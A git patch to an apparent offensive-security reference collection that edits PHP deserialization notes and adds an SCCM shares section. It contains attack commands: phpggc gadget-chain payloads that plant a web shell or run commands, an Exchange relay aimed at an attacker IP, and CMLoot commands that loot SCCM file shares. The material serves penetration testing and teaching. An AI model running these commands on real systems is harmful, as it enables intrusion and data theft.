From d67ec2469cfec8e506561414f1feb98422c490f9 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 4 Dec 2022 11:38:19 +0100 Subject: [PATCH] SCCM Shares --- Insecure Deserialization/PHP.md | 8 +++++--- Methodology and Resources/Active Directory Attack.md | 12 ++++++++++++ 2 files changed, 17 insertions(+), 3 deletions(-) diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index 87083c6..57c513b 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -14,8 +14,9 @@ Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.c * [General concept](#general-concept) * [Authentication bypass](#authentication-bypass) +* [Object Injection](#object-injection) * [Finding and using gadgets](#finding-and-using-gadgets) -* [PHP Phar Deserialization](#php-phar-deserialization) +* [Phar Deserialization](#phar-deserialization) * [Real world examples](#real-world-examples) * [References](#references) @@ -82,7 +83,7 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;} Because `true == "str"` is true. -### Object reference +## Object Injection Vulnerable code: @@ -145,7 +146,7 @@ phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini ``` -## PHP Phar Deserialization +## Phar Deserialization Using `phar://` wrapper, one can trigger a deserialization on the specified file like in `file_get_contents("phar://./archives/app.phar")`. @@ -237,3 +238,4 @@ A valid PHAR includes four elements: * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/) * [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/) * [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization) +* [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - Aug 11, 2022 - xanhacks](https://www.xanhacks.xyz/p/php-gadget-chain/#introduction) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 9088d15..4f3f119 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -120,6 +120,7 @@ - [PrivExchange attack](#privexchange-attack) - [SCCM Deployment](#sccm-deployment) - [SCCM Network Access Accounts](#sccm-network-access-accounts) + - [SCCM Shares](#sccm-shares) - [WSUS Deployment](#wsus-deployment) - [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise) - [PXE Boot image attack](#pxe-boot-image-attack) @@ -3742,6 +3743,17 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th ConvertFrom-SddlString "" ``` +### SCCM Shares + +> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares + +* [1njected/CMLoot](https://github.com/1njected/CMLoot) + ```ps1 + Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt + Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml + Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi + ``` + ### WSUS Deployment